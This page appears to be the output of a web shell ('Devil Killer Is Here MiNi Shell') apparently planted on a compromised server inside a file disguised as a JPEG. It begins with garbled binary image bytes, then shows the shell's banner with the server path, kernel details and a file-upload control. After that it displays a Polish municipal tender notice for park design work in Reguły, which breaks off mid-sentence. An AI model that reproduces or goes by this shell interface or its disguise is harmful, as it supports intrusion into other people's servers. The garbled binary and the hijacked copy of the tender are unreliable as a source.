JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20231122/0050285001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Opracowanie kompletnej wielobranżowej dokumentacji projektowej dla zagospodarowania przestrzeni Parku w Regułach” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MICHAŁOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269290</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Powstańców Warszawy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Reguły</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-816</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@michalowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.michalowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Opracowanie kompletnej wielobranżowej dokumentacji projektowej dla zagospodarowania przestrzeni Parku w Regułach” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7df65c64-8541-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00502850</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00045881/26/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.30 Opracowanie kompletnej wielobranżowej dokumentacji projektowej dla zagospodarowania przestrzeni Parku w Regułach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7df65c64-8541-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2) Korzystanie z Platformy e-Zamówienia jest bezpłatne. 3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. 4) Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia<br/>określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy<br/>(Dz. U. z 2020 poz. 2415): a) oświadczenia, o których mowa w art. 125 ust. 1Pzp, podmiotowe środki dowodowe, przedmiotowe środki dowodów,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w ogólnodostępnych formatach danych, w szczególności w formatach; .txt, .rtf, .pdf, .doc, .docx, .odt. Zamawiający zaleca sporządzanie dokumentów elektronicznych w formacie .pdf. b) oświadczenia, o których mowa w art. 125 ust. 1 Pzp składa się pod rygorem nieważności w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. 2) Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”). 3) W przypadku opatrywania dokumentów elektronicznych kwalifikowanym podpisem elektronicznym: a) dla dokumentów elektronicznych w formacie .pdf zaleca się zastosowanie kwalifikowanego podpisu elektronicznego w formacie<br/>PAdES, b) dla dokumentów elektronicznych w formacie innym niż .pdf zaleca się zastosowanie kwalifikowanego podpisu elektronicznego wewnętrznego w formacie XAdES, c) w przypadku użycia kwalifikowanego podpisu elektronicznego w formacie XAdES w wariancie zewnętrznym, należy pamiętać, aby przekazać zarówno podpisywany dokument elektroniczny oraz plik podpisu zewnętrznego. 4) Opatrzenie oświadczeń lub dokumentów podpisem zaufanym możliwe jest w serwisie gov.pl pod adresem: https://www.gov.pl/web/gov/podpisz-dokument-elektronicznie-wykorzystaj-podpiszaufany. Aby opatrzyć oświadczenia lub dokumenty podpisem zaufanym należy posiadać profil zaufany ePUAP. Szczegóły dotyczące zakładania profilu zaufanego znajdują się na stronie gov.pl pod adresem:<br/>https://www.gov.pl/web/gov/zalozprofil-zaufany. W przypadku dokumentów elektronicznych sporządzonych w formacie .pdf możliwe jest ich opatrzenie podpisem zaufanym w formacie dedykowanym dla dokumentów .pdf.<br/>5) Opatrzenie oświadczeń lub dokumentów podpisem osobistym wymaga posiadania dowodu osobistego z certyfikatem podpisu osobistego: „e-dowodu” oraz specjalistycznego czytnika. Szczegóły dotyczące podpisu osobistego oraz e-dowodu znajdują się w serwisie gov.pl pod adresem: https://www.gov.pl/web/edowod/podpis-osobisty. 5. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z art. 13 RODO dotyczący zbierania danych osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu związanym z postępowaniem o udzielenie zamówienia publicznego Zamawiający informuje, że: Urząd Gminy Michałowice reprezentowany przez Wójta Gminy przetwarza dane zawarte w ofertach, znajdujące się w publicznie dostępnych rejestrach (Krajowy Rejestr Sądowy, Centralna Ewidencja i Informacja o Działalności Gospodarczej RP, Krajowy Rejestr<br/>Karny) w celu prowadzenia postępowań w sprawie zamówienia publicznego na postawie przepisów ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych. Wśród tych informacji mogą pojawić się dane, które na gruncie rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej: „Ogólne Rozporządzenie” lub „RODO”), mają charakter danych osobowych.<br/>W świetle powyższego Wójt Gminy informuje, że: 1. Administratorem danych osobowych (dalej: „Administrator”) jest GMINA MICHAŁOWICE 05-816 Michałowice, Reguły ul. Aleja Powstańców Warszawy 1 tel. 22 350 91 91; fax: 22 350 91 01 e-mail: sekretariat@michalowice.pl 2. W sprawach związanych z Pani/Pana danymi proszę kontaktować się z Inspektorem Ochrony Danych Panem Piotrem Glen, kontakt pisemny za pomocą poczty tradycyjnej na adres wskazany powyżej bądź email: daneosobowe@michalowice.pl; 3. Dane osobowe zawarte w ofertach są przetwarzane na podstawie art. 6 ust. 1 lit. c RODO, tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze oraz następujące przepisy prawa: ustawa z dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz.U. Dz.U. 2022 poz. 1710 ze zm.), rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia<br/>23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od wykonawcy (Dz.U. 2020 poz. 2415), ustawa o narodowym zasobie archiwalnym i archiwach (tj. Dz.U. 2020 poz. 164 ze zm.). 4. Celem przetwarzania danych osobowych jest prowadzenie w imieniu własnym postępowań o udzielenie zamówień publicznych. Przetwarzanie danych osobowych na potrzeby ww. postępowań mieści się w zakresie obowiązków ustawowych Urzędu Gminy jako zamawiającego w rozumieniu art. 4 ust. 1 ustawy PZP. Przetwarzanie tych danych jest niezbędne, aby Urząd Gminy mógł prawidłowo wypełniać nałożone na nie obowiązki.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu do ich wniesienia.<br/>2. W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego. 3. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą. 4. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego. 5. Zasada jawności, o której mowa w art. 74 Pzp ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO, zebranych w toku postępowania o udzielenie zamówienia publicznego. Ograniczenia zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3–6, stosuje się odpowiednio.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.64.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest opracowanie kompletnej wielobranżowej dokumentacji projektowej dla zagospodarowania<br/>przestrzeni parku w Regułach na dz. nr ew. 481/2, 483 obr. Reguły, gm. Michałowice wraz z uzyskaniem decyzji o<br/>pozwoleniu na budowę oraz wszystkich innych decyzji, warunków, pozwoleń i uzgodnień, niezbędnych dla realizacji<br/>inwestycji. Przedmiot zamówienia obejmuje również prowadzenie nadzoru autorskiego nad realizacją inwestycji.<br/>2. Opracowana dokumentacja projektowa powinna uwzględniać możliwość realizacji inwestycji w dwóch zadaniach:<br/>Zadanie I – dz. nr ew. 481/2 „Zagospodarowanie przestrzeni zabytkowego Parku w Regułach”,<br/>Zadanie II – dz. nr ew. 483 „Zagospodarowanie przestrzeni Parku w Regułach”.<br/>Projekt należy sporządzić oddzielnie dla każdego zadania.<br/>3. Projekt powinien uwzględniać uporządkowanie przestrzeni parku, przywrócenie jego historycznych walorów oraz<br/>dostosowanie go do funkcji kulturalnej, turystycznej, sportowej i społecznej.<br/>Zakres projektu dla Zadania I oraz Zadania II:<br/>- projekt gospodarki drzewostanem, uwzględniający pielęgnację istniejących koron i korzeni drzew oraz inwentaryzację<br/>opisującą średnicę pni oraz zasięg koron drzew,<br/>- inwentaryzacja przyrodnicza, zawierająca opis występującej na terenie parku fauny oraz wytyczne i zalecenia do projektu,<br/>mające na celu jej ochronę (inwentaryzacja ornitologiczna, chiropterologiczną i teriologiczną),<br/>- inwentaryzacja przyrodnicza, zawierająca opis występującej na terenie parku flory (poza drzewami), wskazująca gatunki<br/>cenne do zachowania oraz wytyczne i zalecenia do projektu, mające na celu ich ochronę,<br/>- szczegółowe wytyczne dotyczące ochrony roślin i zwierząt podczas prowadzenia robót budowlanych.<br/>Zakres projektu dla Zadania I (na terenie dz. nr ew. 481/2 ):<br/>- demontaż istniejącego pomostu na stawie parkowym oraz budowę nowego pomostu,<br/>- budowa małej sceny plenerowej (letniego podestu) wraz z zadaszeniem przy świetlicy zlokalizowanej na terenie parku,<br/>- przebudowa/rozbudowa nawierzchni istniejących alejek (należy zaprojektować nawierzchnie przepuszczalne),<br/>- przebudowa/rozbudowa oświetlenia parkowego,<br/>- wymiana i uzupełnienie obiektów małej architektury tj. ławek, koszy na śmieci,<br/>Zakres projektu dla Zadania II (na terenie dz. nr ew. 483):<br/>- uporządkowanie przestrzeni wraz z rozbiórką fundamentów budynku,<br/>- budowa małej tężni solankowej,<br/>- budowa alejek parkowych należy zaprojektować nawierzchnie przepuszczalne),<br/>- wykonanie miejsca na ognisko,<br/>- projekt nowych nasadzeń i trawników,<br/>- budowa sieci i urządzeń oświetlenia i monitoringu,<br/>- montaż zewnętrznego teleskopu astronomicznego/lunety astronomicznej,<br/>- budowa obiektów małej architektury (ławki, kosze na śmieci, stojaki na rowery itp.).<br/>4. Dokumentacja, na którą składają się opracowania wymienione w ust. 3 oraz inne dokumenty formalno-prawne i<br/>projektowe niezbędne do wykonania przedmiotu zamówienia, muszą być zgodne z obowiązującymi przepisami prawa<br/>aktualnymi na dzień złożenia dokumentacji i muszą umożliwić wykonanie robót budowlanych niezbędnych dla prawidłowego<br/>funkcjonowania obiektu.<br/>5. Projekt w zakresie Zadania I tj. dotyczący dz. nr ew. 481/2, należy uzgodnić z Mazowieckim Wojewódzkim<br/>Konserwatorem Zabytków, zgodnie z ustaleniami obowiązującego miejscowego planu zagospodarowania przestrzennego<br/>oraz Zarządzeniem Wójta Gminy Michałowice nr 218/2021 z dnia 19.10.2021 r. w sprawie przyjęcia Gminnej Ewidencji<br/>Zabytków Gminy Michałowice.<br/>6. Obiekt po zrealizowaniu robót budowlanych na podstawie dokumentacji musi spełniać warunki ochrony przeciwpożarowej<br/>i higieniczno-sanitarnej.<br/>7. Dokumentacja projektowo-kosztorysowa musi być zgodna z Ustawą z dnia 7 lipca 1994 r. Prawo budowlane.<br/>8. Dokumentacja projektowa musi być wykonana zgodnie z rozporządzeniem Ministra Rozwoju i Technologii z dnia 20<br/>grudnia 2021 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych<br/>wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2021 r., poz. 2454).Kosztorys<br/>inwestorski powinien zostać opracowany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w<br/>sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac<br/>projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U z<br/>2021 r. poz. 2458).<br/>9. Przedmiary robót - zestawienie planowanych robót w kolejności technologicznej ich wykonania, obliczenie i podanie ilości<br/>ustalonych jednostek przedmiarowych, wskazanie podstaw do ustalenia szczegółowego opisu robót, winno być sporządzone<br/>na podstawie dokumentacji projektowej oraz Specyfikacji Technicznej Wykonania i Odbioru Robót. Przedmiar robót musi<br/>być wykonany zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego<br/>zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu<br/>funkcjonalno–użytkowego (Dz.U. z 2021 r. poz. 2454).<br/>10. Dokumentacja projektowo-kosztorysowa winna być opracowana w sposób jednoznaczny i wyczerpujący za pomocą<br/>dostatecznie dokładnych i zrozumiałych określeń, uwzględniając wszystkie wymagania i okoliczności mogące mieć wpływ<br/>na sporządzenie oferty.<br/>11. Nie należy również opisywać przedmiotu umowy przez wskazanie znaków towarowych, patentów lub pochodzenia,<br/>chyba że jest to uzasadnione specyfikacją przedmiotu zamówienia, za pomocą dostatecznie dokładnych określeń, a<br/>wskazaniu takiemu towarzyszą wyrazy „lub równoważny” zgodnie z ustawą Prawo zamówień publicznych, w takim<br/>przypadku należy opisać dla każdego materiału i urządzenia zestawienie parametrów techniczno - użytkowych do<br/>spełnienia przez materiały czy urządzenia równoważne.<br/>12. Dokumentacja musi być wykonana zgodnie z wymaganiami Zamawiającego dla przedmiotowego zamówienia oraz<br/>przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane, a także zgodnie z wszelkimi aktami prawnymi właściwymi w<br/>przedmiocie zamówienia, z przepisami techniczno-budowlanymi, obowiązującymi na terenie kraju normami krajowymi<br/>przenoszącymi normy europejskie, europejskie oceny techniczne, wspólnych specyfikacji technicznych, norm<br/>międzynarodowych lub w przypadku ich braku norm krajowych, krajowych aprobat technicznych, wytycznymi a wskazaniu<br/>takiemu towarzyszą wyrazy „lub równoważne” oraz zasadami wiedzy technicznej. Dokumentacja projektowa winna być<br/>opracowana i sprawdzona przez uprawnionych projektantów.<br/>13. Wykonawca zobowiązany jest do wykonania dokumentacji projektowej w postaci elektronicznej, która umożliwi<br/>procedowanie pozwolenia na budowę lub stosownych zgód w wersji elektronicznej. Dokumentacja projektowa winna być<br/>przekazana Zamawiającemu w wersji elektronicznej (w formacie PDF oraz w wersji edytowalnej – możliwość odczytu plików<br/>ath, dwg) na płycie CD (opis płyty powinien być trwały i zawierać tytuł projektu i dane jego autora) lub innym uzgodnionym z<br/>Zamawiającym nośniku oraz w 3 egz. w formie papierowej. Wersja papierowa musi dokładnie odpowiadać wersji<br/>elektronicznej na co projektant złoży stosowne oświadczenie.<br/>14. Wielobranżowa dokumentacja projektowa, składająca się na przedmiot zamówienia, będzie zawierać następujące<br/>opracowania w formie papierowej i elektronicznej dla każdego zadania oddzielnie:<br/>1) Projekt budowlany składający się z:<br/>a) projektu architektoniczno – budowlanego,<br/>b) projektu zagospodarowania terenu (w tym projektów niezbędnych przyłączy do sieci infrastruktury technicznej),<br/>c) projektu technicznego,<br/>d) projektu gospodarki drzewostanem, uwzględniającego pielęgnację korzeni i koron drzew,<br/>e) inwentaryzacji przyrodniczej,<br/>f) uzgodnień oraz dokumentów właściwych dla tego etapu tj. min. mapa do celów projektowych, zgoda na wycinkę drzew,<br/>warunki na przyłączenie mediów, uzgodnienie z MWKZ, pozwolenie/zgłoszenie wodnoprawne dotyczące budowy pomostu<br/>2) Wielobranżowy projekt wykonawczy.<br/>3) Kosztorys inwestorski w formie wydruku i pliku, który zostanie odczytany przez program NORMA.<br/>4) Przedmiar robót.<br/>5) Specyfikacje techniczne wykonania i odbioru robót.<br/>15. Dla zakresu robót, którego wykonanie zgodnie z przepisami Prawa Budowlanego nie wymaga uzyskania decyzji<br/>pozwolenia na budowę lub zgłoszenia robót wymagana będzie tylko dokumentacja wykonawcza.<br/>16. Dokumentacja projektowa swym zakresem powinna obejmować branże:<br/>a) architektoniczną<br/>b) konstrukcyjno – budowlaną<br/>c) sanitarną<br/>d) elektryczną<br/>e) drogową<br/>f) zieleni wraz z gospodarką drzewostanem<br/>17. Liczba dokumentacji przekazywanej Zamawiającemu dla każdego zadania oddzielnie:<br/>1) Trzy egzemplarze projektu budowlanego i projektu wykonawczego (nie licząc egzemplarzy wymaganych na etapie<br/>uzgodnień, opinii i pozwoleń) w formacie A-3, oprawionych w sztywnych okładkach skoroszytowych (również formatu A-3),<br/>umożliwiających wielokrotne wykorzystywanie na papierze o gramaturze 160 g/m2,<br/>2) Jeden egzemplarz na 